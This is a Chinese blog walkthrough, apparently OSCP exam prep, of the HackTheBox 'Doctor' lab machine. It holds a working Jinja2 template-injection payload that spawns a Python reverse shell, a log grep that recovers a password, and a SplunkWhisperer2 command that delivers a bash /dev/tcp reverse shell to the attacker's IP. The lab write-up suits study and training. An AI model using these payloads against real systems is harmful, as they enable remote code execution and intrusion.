OSCP备考_0x30_HackThBox靶机_Linux_Doctor

Ethan医生15小时前靶场8

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.7.227 (扫描UDP)

image.png

http://10.129.7.227/blog.html#


image.png

http://doctors.htb/login?next=%2F ,绑定hosts后直接跳转登入页面


image.png

先注册一个账号然后登入进去看有没有可利用的东西

image.png

然后有使用curl去检查这个使用域名打开的网站

curl -i http://doctors.htb/

image.png

我们发现这个服务是Werkzeug,并且是一个python服务器

Python Web 服务器可能容易受到服务器端模板注入的攻击。

我们再信息中

这个github中有一个就是测试模板注入的

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md

然后去到这个目录下archive

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.16.31\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

直接反弹了

image.png



cd /var/log

grep -r passw . 2>/dev/null

image.png

Guitar123

我们再之前浏览是发现8089需要密码,然后使用这个登录,然后再对版本号进行搜索


https://doctors.htb:8089/

image.png

image.png

其中一个应该是账号

git clone https://github.com/cnotin/SplunkWhisperer2.git

python3 PySplunkWhisperer2_remote.py --host 10.129.7.227 --lhost 10.10.16.31 --username shaun --password Guitar123 --payload "bash -c 'bash -i >& /dev/tcp/10.10.16.31/3333 0>&1'"

image.png

标签: OSCP
返回列表

上一篇:OSCP备考_0x29_HackThBox靶机_Linux_tabby

没有最新的文章了...

相关文章

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

OSCP备考_0x20_HackThBox靶机_Linux_Blocky

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.14.190 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x26_HackThBox靶机_Linux_magic

OSCP备考_0x26_HackThBox靶机_Linux_magic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.216.125 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

OSCP备考_0x14_HackThBox靶机_Linux_Swagshop

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.180.205 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

OSCP备考_0x22_Vulnhub靶机_symfonos: 5

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。